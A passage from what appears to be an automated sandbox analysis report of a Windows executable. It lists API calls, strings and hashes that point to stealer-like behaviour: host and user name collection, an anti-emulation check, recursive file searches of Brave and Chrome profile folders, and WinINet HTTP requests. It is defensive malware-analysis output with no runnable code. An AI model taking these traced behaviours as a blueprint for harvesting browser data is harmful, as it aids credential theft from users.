                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,024ECDB8,00000000,00000000,00400100,00000000), ref: 00406385
                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                    • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                    • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                    • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                    • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocComputerNameProcess
                    • String ID:
                    • API String ID: 4203777966-0
                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                    • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                    • ExitProcess.KERNEL32 ref: 00401143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 024BFAA7
                    • Module32First.KERNEL32(00000000,00000224), ref: 024BFAC7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024BE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_24be000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 01e08444e27cf3954d823b6c477de898a56e0281be35170541b0068fdb1c0807
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: D3F0FC321007116FD7253BF5DC8CBAF72E8AF4D324F11012AF546919D0DB70E8494670
                    APIs
                    • SetErrorMode.KERNEL32(00000400,?,?,040A0223,?,?), ref: 040A0E19
                    • SetErrorMode.KERNEL32(00000000,?,?,040A0223,?,?), ref: 040A0E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: aa8218d920a278acd49a8db63b1ae2b83c19079fa7ae511ab9695a0ffe455710
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: E5D0123114512C77DB402ED4DC09BCD7B5CDF09B62F008011FB0DE9080C770954046E5
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                    APIs
                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                    • ExitProcess.KERNEL32 ref: 004011C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocName$ComputerExitUser
                    • String ID:
                    • API String ID: 1004333139-0
                    • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                    • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                    • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                    • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 024BF78F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024BE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_24be000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: c594bcc7d7033acd5ef6961cd0564c8ed891100217d13d4c1c260726b5654ddc
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: D9113C79A00208EFDB01DF98C985E99BFF5AF08750F068095F9489B361D371EA90DF90
                    APIs
                    • wsprintfA.USER32 ref: 004138CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-817767981
                    • Opcode ID: 6cb684ace6967589941c3eb8540661810fdcea85d8e50341589a8dc562ba4125
                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                    • Opcode Fuzzy Hash: 6cb684ace6967589941c3eb8540661810fdcea85d8e50341589a8dc562ba4125
                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: 9738bf910ff1965ffb943994e09d242b4311d669ed09d9d9b2d3beb31a06f825
                    • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                    • Opcode Fuzzy Hash: 9738bf910ff1965ffb943994e09d242b4311d669ed09d9d9b2d3beb31a06f825
                    • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                    APIs
                    • wsprintfA.USER32 ref: 0041492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                    • FindClose.KERNEL32(000000FF), ref: 00414B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: 637e1f55b370a77931354714e54409c2954acea7e3f6c3a29657c541e3a86ea0
                    • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                    • Opcode Fuzzy Hash: 637e1f55b370a77931354714e54409c2954acea7e3f6c3a29657c541e3a86ea0
                    • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                    APIs
                    • wsprintfA.USER32 ref: 040B3B33
                    • FindFirstFileA.KERNEL32(?,?), ref: 040B3B4A
                    • lstrcat.KERNEL32(?,?), ref: 040B3B9C
                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 040B3BAE
                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 040B3BC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040B3ECE
                    • FindClose.KERNEL32(000000FF), ref: 040B3EE3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID:
                    • API String ID: 1125553467-0
                    • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                    • Instruction ID: 03ec0b458e740f53f6e48d96f1a458cbe4565dab6a388247d5a5c23dbe61f5ce
                    • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                    • Instruction Fuzzy Hash: 79A194B5A40218ABDB30DFA4CC84FEE73B9FF45304F044589A64DA6180DB74AB84CF96
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                    • HeapAlloc.KERNEL32(00000000), ref: 00414587
                    • wsprintfA.USER32 ref: 004145A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                    • FindClose.KERNEL32(000000FF), ref: 004146A0
                    • lstrcatA.KERNEL32(?,024E90F0,?,00000104), ref: 004146C5
                    • lstrcatA.KERNEL32(?,024EC110), ref: 004146D8
                    • lstrlenA.KERNEL32(?), ref: 004146E5
                    • lstrlenA.KERNEL32(?), ref: 004146F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 13328894-2848263008
                    • Opcode ID: 49f7cd920285fb998418c40c2082670281bcd5633157a42a48444e56202711e4
                    • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                    • Opcode Fuzzy Hash: 49f7cd920285fb998418c40c2082670281bcd5633157a42a48444e56202711e4
                    • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                    APIs
                    • wsprintfA.USER32 ref: 040B4B93
                    • FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                    • FindClose.KERNEL32(000000FF), ref: 040B4DF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID:
                    • API String ID: 180737720-0
                    • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                    • Instruction ID: f12e136bc689036e0f5c53e0dfe77d545a3703e0b34f4244123f3420261d4619
                    • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                    • Instruction Fuzzy Hash: 2461A6B5A40218BBDB20EBE0DD44FEE73BDFB49304F00458CA649A6141EB75A745CF95
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 040AC15C
                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 040AC1B4
                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 040AC1CA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040ACA26
                    • FindClose.KERNEL32(000000FF), ref: 040ACA38
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                    • Instruction ID: 7ad36ffe0440553eb9d930556d1cbabf0a4023d7b1b22cdeb37f604ce8702d49
                    • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                    • Instruction Fuzzy Hash: 05424172A10104ABEB14FBB4DD95EEE7379AF9430CF404158A54AB6190EF34BB48CFA5
                    APIs
                    • wsprintfA.USER32 ref: 00413EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                    • FindClose.KERNEL32(000000FF), ref: 00414081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: e1a96a9cc30f0257c9d9d85f794f09743e15ad4d0fc8c7b306005909d784861f
                    • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                    • Opcode Fuzzy Hash: e1a96a9cc30f0257c9d9d85f794f09743e15ad4d0fc8c7b306005909d784861f
                    • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 040B47E7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B47EE
                    • wsprintfA.USER32 ref: 040B480D
                    • FindFirstFileA.KERNEL32(?,?), ref: 040B4824
                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 040B4852
                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 040B4868
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040B48F2
                    • FindClose.KERNEL32(000000FF), ref: 040B4907
                    • lstrcat.KERNEL32(?,0064A524), ref: 040B492C
                    • lstrcat.KERNEL32(?,0064A22C), ref: 040B493F
                    • lstrlen.KERNEL32(?), ref: 040B494C
                    • lstrlen.KERNEL32(?), ref: 040B495D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID:
                    • API String ID: 671575355-0
                    • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                    • Instruction ID: 43f7ce0e70792d7d9b2caf22e0bd8c47f0d2153dcf223ac1c2453e52c8d1ed41
                    • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                    • Instruction Fuzzy Hash: 685199B5580218ABD724EFB0DC88FED737DEB54304F404588E649A6190DB74AB85CF95
                    APIs
                    • wsprintfA.USER32 ref: 040B412A
                    • FindFirstFileA.KERNEL32(?,?), ref: 040B4141
                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 040B416F
                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 040B4185
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040B42D3
                    • FindClose.KERNEL32(000000FF), ref: 040B42E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID:
                    • API String ID: 180737720-0
                    • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                    • Instruction ID: 757a2d089d848b95b7054c35b1a725c68dc78e95bd4b134a2fd5ff09c35a16de
                    • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                    • Instruction Fuzzy Hash: 5F5173B6900218BBDB24FBF0DC84EEE737DBB44304F4085C8A689A6140EB75A785CF95
                    APIs
                    • wsprintfA.USER32 ref: 0040ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
